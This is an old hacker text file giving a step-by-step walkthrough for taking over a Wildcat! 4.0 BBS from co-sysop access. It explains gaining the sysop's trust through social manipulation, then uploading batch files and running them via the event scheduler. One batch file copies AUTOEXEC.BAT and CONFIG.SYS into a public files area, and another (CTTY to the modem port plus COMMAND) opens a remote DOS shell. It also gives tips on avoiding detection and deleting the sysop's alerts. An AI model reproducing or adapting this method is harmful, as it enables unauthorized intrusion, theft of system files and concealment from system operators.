::--==--==--==--==--==--==--==--==--==--==--==--==--==--==--==--==--==--==--==::
::      .ooO A More Stealthy way to Hack a Wildcat BBS by wyze1 Ooo.          ::
::--==--==--==--==--==--==--==--==--==--==--==--==--==--==--==--==--==--==--==::
::									      ::
:: Shelling into DOS on a Wildcat! 4.0 BBS is fairly easy should one be able  ::
:: to get co-sysop access to the board. Hard as it may sound, this is in fact ::
:: much easier than you would originally think it to be. By participating in  ::
:: the message boards, uploading often and being nice in general, it is quite ::
:: likely that the sysop will take a liking to you, and seriously consider    ::
:: doing so when you ask him for co-sysop access.			      ::
::									      ::
:: Of course, should he refuse, you'll just have to somehow hack yourself an  ::
:: account with co-sysop equivalence. But that isn't the point of this        ::
:: article, the point of this article is to tell you what to do *after* that. ::
:: The hack is a method originally thought up by RoBoTiC HaMSTeR which I      ::
:: found to be an unreliable system because of a very big problem which       ::
:: affected it.								      ::
::								              ::
:: The problem with his exploit, or rather, his style of using the exploit,   ::
:: was that you had to guess what COM port the Sysop's modem was on, and if   ::
:: you got it wrong - The System locked up, leaving the sysop to find his     ::
:: beloved BBS frozen in the morning, and a screen that has you trying to do  ::
:: evil things to it - Not a pleasant situation.			      ::
::									      ::
:: So, here's how to go about hacking a Wildcat! BBS in a method which takes a::
:: little bit longer, but is also a lot more stealthy and won't get you bust. ::
::								              ::
:: Go to the co-sysop menu by typing "1" at the menu prompt.		      ::
::									      ::
:: Run the "Even management" option. You should see a screen like this:       ::
::									      ::
::............................................................................::
::  #  Description  Schedule Type  Start      Last Execute       Parameters   ::
:: --- ------------- -------- ---- ------- --------------------   ----------  ::
::   1 Run batch     SMTWTFS  Soft 12:00am Wed 10/12/94 10:30am   STUFF.BAT   ::
:: * 2 Run batch     SMTWTFS  Hard 2:00am  Fri 10/28/94 1:00am    FUCTUP.BAT  ::
::   3 Run batch     SMTWTFS  Hard 3:00am  Sat 08/27/94 12:00am   TERM.BAT    ::
::   4 Run batch     SMTWTFS  Soft 4:00pm  Wed 10/12/94 4:00pm    MORSTUF.BAT ::
:: * 5 Reset stats   SMTWTFS  Soft 4:00pm  Thu 10/27/94 12:00pm               ::
::   6 Run batch     SMTWTFS  Soft 9:00pm  Wed 10/12/94 8:00pm    STUFF.BAT   ::
:: Current time:  Fri 05/22/99 12:23pm                                        ::
:: Edit [A]dd, [E]dit, [R]un, [D]elete, [S]chedule, [H]elp, [Q]uit? [ ]       ::
::............................................................................::
::                                                                            ::
:: Now, select [E] to Edit the properties of a scheduled event, you will then ::
:: see a screen like this...					              ::
::									      ::
::............................................................................::
:: [E]nabled       : No							      ::
:: [A]ction        : Run batch					              ::
:: [B]atch file    : C:\WILDCAT\TERM.BAT				      ::
:: S[h]ell type    : Terminate						      ::
:: [T]ype          : Hard						      ::
:: T[i]me          : 12:00						      ::
:: S[c]hedule      : Daily						      ::
:: [D]ay           : Sun Mon Tue Wed Thu Fri Sat			      ::
:: [L]ast executed : 08/27/94 12:00					      ::
::								              ::
:: Edit event [S]ave, [Q]uit? [Q]					      ::
::............................................................................::
::									      ::
:: And there you have it - the path for this installation of Wildcat! Now is  ::
:: where we start to get evil. ;) We know that that WC is in C:\WILDCAT and   ::
:: we will guess that their upload directory is C:\WILDCAT\UPLOAD and that the::
:: Misc Files Area is in C:\WILDCAT\MISC				      ::
::									      ::
:: Yes, this does mean that we have to do some guessing, but if we get it     ::
:: wrong, it won't freeze the BBS, so we can keep on trying, and besides,     ::
:: \MISC and \UPLOAD are bound to be there. Anyway... On with the show...     ::
::									      ::
:: We make a batch file with any name, for the purposes of this we will call  ::
:: it BEER.BAT, on our PC that contains the text:			      ::
::									      ::
::............................................................................::
:: COPY C:\AUTOEXEC.BAT C:\WILDCAT\MISC					      ::
:: COPY C:\CONFIG.SYS C:\WILDCAT\MISC					      ::
::............................................................................::
::									      ::
:: We then upload this to the files area of the BBS and go back to the Event  ::
:: Management Menu. We then press "A" to add a scheduled task, and add        ::
:: C:\WILDCAT\UPLOADS\BEER.BAT - You will then be dropped back to the Menu    ::
:: where you press [R] to run BEER.BAT straight away.                         ::
::									      ::
:: If you got the PATH for the Uploads directory wrong, you will see an error ::
:: message like...							      ::
::									      ::
:: System Error:						              ::
:: Sysop has been notified, you may continue...			              ::
::									      ::
:: And if you see nothing, then you have got it right, and the CONFIG.SYS and ::
:: AUTOEXEC.BAT for the BBS System should be in the "Miscallaneous Files" Dir ::
:: If they aren't, then you've guessed the name for that directory wrong - Try::
:: another one. And don't be alarmed by the sysop notifications. We will BE   ::
:: Sysop in a few minutes and we can delete them then.			      ::
::									      ::
:: Now, we take a look at the Sysop's AUTOEXEC.BAT and/or his CONFIG.SYS and  ::
:: Lo' and Behold, I can see what COM port his modem is on. :-) Just look for ::
:: dem horrible little FOSSIL drivers and it will probably be somewhere       ::
:: amongst the command-line parameters for them.			      ::
::								              ::
:: And now, the final step, we make another batch file on our PC's (Called    ::
:: YEEHAA.BAT in this example) and type the following into it                 ::
::									      ::
::............................................................................::
:: CTTY COM2							              ::
:: COMMAND								      ::
::............................................................................::
::									      ::
:: Of course, substituting COM2 for the COM port that the system's modem is   ::
:: on, since we went through all that trouble to find out. We then upload that::
:: file, run it in the same way we did our previous batch file, using the     ::
:: event manager and then...						      ::
::									      ::
:: C:\WILDCAT>								      ::
::									      ::
:: Be good. ;-) 							      ::
::									      ::
::--==--==--==--==--==--==--==--==--==--==--==--==--==--==--==--==--==--==--==::